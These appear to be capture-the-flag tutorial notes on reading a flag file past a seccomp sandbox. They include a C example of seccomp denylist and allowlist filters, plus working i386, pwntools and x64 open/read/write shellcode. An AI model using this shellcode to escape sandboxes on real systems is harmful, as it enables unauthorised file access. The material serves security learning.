sandbox_orw
A sandbox usually just disables the execve syscall, so we cannot get a shell directly with system("/bin/sh\x00"). If prctl or seccomp shows up in the binary, you most likely have to bypass the sandbox with orw, that is, with open, read and write.
First, inspect the sandbox with seccomp-tools:

```shell
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
seccomp-tools dump ./elf
```
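What `seccomp-tools dump` prints is a classic BPF program. As an added example (not code from the original notes), the C below builds the two filter shapes you will typically see: a denylist that only kills execve/execveat, which is exactly the case where open/read/write stay reachable, and an allowlist that permits just the handful of syscalls an orw-style program needs and kills everything else. A tiny interpreter evaluates the filter offline so the verdicts can be checked without installing it; `install_orw_allowlist` shows the real prctl sequence. It assumes Linux/x86-64 headers; the probe table in main is constructed for the demo.

```c
/* Added example: seccomp-BPF denylist vs allowlist, plus an offline evaluator. Linux/x86-64. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

/* Syscalls an orw-style program needs; everything else gets killed by the allowlist. */
static const int ORW_ALLOWED[] = { SYS_read, SYS_write, SYS_open, SYS_openat, SYS_exit, SYS_exit_group };
#define N_ORW_ALLOWED (sizeof ORW_ALLOWED / sizeof ORW_ALLOWED[0])

/* Emit: architecture check, then one JEQ/RET pair per listed syscall, then the default action.
 * The arch check matters: 32-bit (i386) syscall numbers differ from x86-64 ones, so a filter
 * that skips it would apply the wrong numbering to int 0x80 calls. */
static size_t build_filter(const int *nrs, size_t count, unsigned int listed_action,
                           unsigned int default_action, struct sock_filter *out)
{
    size_t n = 0;
    out[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch));
    out[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0);
    out[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL);
    out[n++] = (struct sock_filter)BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr));
    for (size_t i = 0; i < count; i++) {
        out[n++] = (struct sock_filter)BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned int)nrs[i], 0, 1);
        out[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, listed_action);
    }
    out[n++] = (struct sock_filter)BPF_STMT(BPF_RET | BPF_K, default_action);
    return n;
}

/* Minimal evaluator for the three opcodes build_filter emits (ld abs, jeq, ret). */
static unsigned int run_filter(const struct sock_filter *prog, size_t n, const struct seccomp_data *d)
{
    unsigned int acc = 0;
    for (size_t pc = 0; pc < n; pc++) {
        const struct sock_filter *ins = &prog[pc];
        if (ins->code == (BPF_LD | BPF_W | BPF_ABS)) {
            memcpy(&acc, (const char *)d + ins->k, sizeof acc);   /* load nr or arch */
        } else if (ins->code == (BPF_JMP | BPF_JEQ | BPF_K)) {
            pc += (acc == ins->k) ? ins->jt : ins->jf;             /* offsets are relative to next insn */
        } else if (ins->code == (BPF_RET | BPF_K)) {
            return ins->k;
        } else {
            return SECCOMP_RET_KILL;   /* opcode not modelled by this toy evaluator */
        }
    }
    return SECCOMP_RET_KILL;           /* ran off the end; the kernel rejects such programs */
}

/* Denylist as described in the notes: only execve/execveat are blocked, open/read/write pass. */
unsigned int execve_denylist_verdict(unsigned int arch, int nr)
{
    static const int denied[] = { SYS_execve, SYS_execveat };
    struct sock_filter prog[16];
    size_t n = build_filter(denied, 2, SECCOMP_RET_KILL, SECCOMP_RET_ALLOW, prog);
    struct seccomp_data d = { .nr = nr, .arch = arch };
    return run_filter(prog, n, &d);
}

/* Allowlist: only ORW_ALLOWED pass; execve, mprotect, socket, ... are all killed. */
unsigned int orw_allowlist_verdict(unsigned int arch, int nr)
{
    struct sock_filter prog[32];
    size_t n = build_filter(ORW_ALLOWED, N_ORW_ALLOWED, SECCOMP_RET_ALLOW, SECCOMP_RET_KILL, prog);
    struct seccomp_data d = { .nr = nr, .arch = arch };
    return run_filter(prog, n, &d);
}

/* Actually install the allowlist in the calling process (what a challenge binary's init does). */
int install_orw_allowlist(void)
{
    struct sock_filter prog[32];
    size_t n = build_filter(ORW_ALLOWED, N_ORW_ALLOWED, SECCOMP_RET_ALLOW, SECCOMP_RET_KILL, prog);
    struct sock_fprog fprog = { .len = (unsigned short)n, .filter = prog };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)   /* required unless CAP_SYS_ADMIN */
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
}

int main(void)
{
    /* Constructed probe table for the demo. */
    const struct { const char *name; int nr; } probes[] = {
        { "open", SYS_open }, { "read", SYS_read }, { "write", SYS_write },
        { "execve", SYS_execve }, { "mprotect", SYS_mprotect },
    };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-9s denylist=%-5s allowlist=%s\n", probes[i].name,
               execve_denylist_verdict(AUDIT_ARCH_X86_64, probes[i].nr) == SECCOMP_RET_ALLOW ? "ALLOW" : "KILL",
               orw_allowlist_verdict(AUDIT_ARCH_X86_64, probes[i].nr) == SECCOMP_RET_ALLOW ? "ALLOW" : "KILL");
    return 0;
}
```

Reading the dump from a real binary, the thing to look for is which shape you have: a denylist leaves every unlisted syscall (open, read, write, and usually much more) available, while an allowlist tells you precisely which syscalls the remaining payload may use, and whether the arch is checked tells you whether int 0x80-style 32-bit numbering is even considered.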
Bypass with shellcode
x32 (32-bit i386)
Assembly
```python
from pwn import *
context(arch='i386', os='linux')

# open("flag", O_RDONLY): push "flag\0" onto the stack, ebx = path, ecx = flags, edx = mode, eax = 5
shellcode  = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
# read(3, esp, 0x100): assumes the new fd is 3 (no other files open); reuses the stack as the buffer
shellcode += asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x100;int 0x80')
# write(1, esp, 0x100): ecx/edx still hold the buffer and length from the read
shellcode += asm('mov eax,0x4;mov ebx,0x1;int 0x80')
```
Using pwntools

```python
# save_to must be the address of a writable buffer in the target (set it per binary)
payload  = shellcraft.i386.open('flag.txt')
payload += shellcraft.i386.read(0x3, save_to, 0x100)
payload += shellcraft.i386.write(0x1, save_to, 0x100)
sh.sendline(asm(payload))
```
x64
Assembly

```python
# convert_str_asmencode is a helper (not shown in these notes) that turns an 8-byte string
# into its little-endian integer literal; "././flag" is padded to exactly 8 bytes so the
# immediate contains no null bytes.
shellcode = f"""
    xor rsi, rsi;
    xor rdx, rdx;
    push rdx;
    mov rax, {convert_str_asmencode("././flag")};   # change to match the file name
    push rax;
    mov rdi, rsp;
    xor rax, rax;
    mov al, 2;        # open(rdi = "././flag", rsi = 0, rdx = 0)
    syscall;
    mov rdi, rax;     # fd returned by open
    mov dl, 0x40;     # read 0x40 bytes
    mov rsi, rsp;     # reuse the stack as the buffer
    mov al, 0;        # read(fd, rsp, 0x40)
    syscall;
    xor rdi, rdi;     # fd 0: works when stdin is a socket or tty; use 1 for stdout otherwise
    mov al, 1;        # write(0, rsp, 0x40)
    syscall;
"""
```